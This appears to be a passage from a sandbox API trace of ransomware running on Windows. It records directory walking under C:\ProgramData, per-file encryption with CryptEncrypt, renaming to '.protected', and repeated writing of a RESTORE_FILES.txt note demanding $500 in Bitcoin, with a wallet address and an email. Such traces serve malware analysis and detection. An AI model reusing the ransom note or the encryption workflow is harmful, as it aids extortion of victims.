dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0077.355] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.355] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0077.356] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.356] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0077.356] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.356] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0077.356] CloseHandle (hObject=0xb4) returned 1 [0077.356] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0077.356] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0077.357] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0077.357] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.358] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0077.359] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.359] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0077.359] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.359] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0077.359] CloseHandle (hObject=0xa4) returned 1 [0077.359] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0077.359] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0077.359] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\RESTORE_FILES.txt") returned 50 [0077.359] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0077.360] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.360] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0077.361] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0077.361] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0077.361] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0077.361] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0077.361] CloseHandle (hObject=0xac) returned 1 [0077.361] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="Windows") returned -1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files") returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files (x86)") returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="$Recycle.bin") returned 1 [0077.361] lstrcmpiW (lpString1="Start Menu", lpString2="System Volume Information") returned -1 [0077.361] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Start Menu") returned 29 [0077.361] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0077.361] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0077.361] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Start Menu\\*") returned 31 [0077.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0077.361] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0077.361] lstrcmpiW (lpString1="Sun", lpString2="Windows") returned -1 [0077.361] lstrcmpiW (lpString1="Sun", lpString2="Program Files") returned 1 [0077.361] lstrcmpiW (lpString1="Sun", lpString2="Program Files (x86)") returned 1 [0077.361] lstrcmpiW (lpString1="Sun", lpString2="$Recycle.bin") returned 1 [0077.362] lstrcmpiW (lpString1="Sun", lpString2="System Volume Information") returned -1 [0077.362] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun") returned 22 [0077.362] lstrcmpW (lpString1="Sun", lpString2=".") returned 1 [0077.362] lstrcmpW (lpString1="Sun", lpString2="..") returned 1 [0077.362] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\*") returned 24 [0077.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0077.364] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.364] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.364] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.364] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.365] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.365] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\.") returned 24 [0077.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.365] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.365] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.365] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.365] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.365] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.365] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.365] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\..") returned 25 [0077.365] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.365] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.365] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="Windows") returned -1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="Program Files") returned -1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="Program Files (x86)") returned -1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="$Recycle.bin") returned 1 [0077.365] lstrcmpiW (lpString1="Java", lpString2="System Volume Information") returned -1 [0077.365] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java") returned 27 [0077.365] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0077.366] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0077.366] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\*") returned 29 [0077.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0077.366] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.366] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.366] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.366] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.366] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.366] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\.") returned 29 [0077.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.366] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.367] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.367] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.367] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.367] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.367] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.367] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\..") returned 30 [0077.367] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.367] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="Windows") returned -1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="Program Files") returned -1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="Program Files (x86)") returned -1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="$Recycle.bin") returned 1 [0077.367] lstrcmpiW (lpString1="Java Update", lpString2="System Volume Information") returned -1 [0077.367] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update") returned 39 [0077.367] lstrcmpW (lpString1="Java Update", lpString2=".") returned 1 [0077.367] lstrcmpW (lpString1="Java Update", lpString2="..") returned 1 [0077.368] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*") returned 41 [0077.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0077.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0077.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0077.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0077.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0077.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0077.368] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\.") returned 41 [0077.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.368] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.368] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0077.368] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0077.368] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0077.369] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0077.369] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0077.369] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\..") returned 42 [0077.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.369] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="Windows") returned -1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="Program Files") returned -1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="Program Files (x86)") returned -1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="$Recycle.bin") returned 1 [0077.369] lstrcmpiW (lpString1="jaureglist.xml", lpString2="System Volume Information") returned -1 [0077.369] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrIW (lpFirst="jaureglist.xml", lpSrch=".protected") returned 0x0 [0077.369] lstrcmpW (lpString1="jaureglist.xml", lpString2="RESTORE_FILES.txt") returned -1 [0077.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0077.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0077.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0077.369] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrW (lpFirst="jaureglist.xml", lpSrch=".txt") returned 0x0 [0077.369] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrW (lpFirst="jaureglist.xml", lpSrch=".rar") returned 0x0 [0077.369] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml") returned 54 [0077.369] StrStrW (lpFirst="jaureglist.xml", lpSrch=".zip") returned 0x0 [0077.370] ReadFile (in: hFile=0xd4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ef04*=0x77, lpOverlapped=0x0) returned 1 [0077.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff89, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.370] WriteFile (in: hFile=0xd4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x77, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ef04*=0x77, lpOverlapped=0x0) returned 1 [0077.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.370] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0077.371] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0077.371] CloseHandle (hObject=0xd4) returned 1 [0077.371] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.protected") returned 64 [0077.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.protected" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.protected")) returned 1 [0077.371] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0077.372] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0077.372] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\RESTORE_FILES.txt") returned 57 [0077.372] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\sun\\java\\java update\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0077.372] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.372] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0077.372] lstrlenA 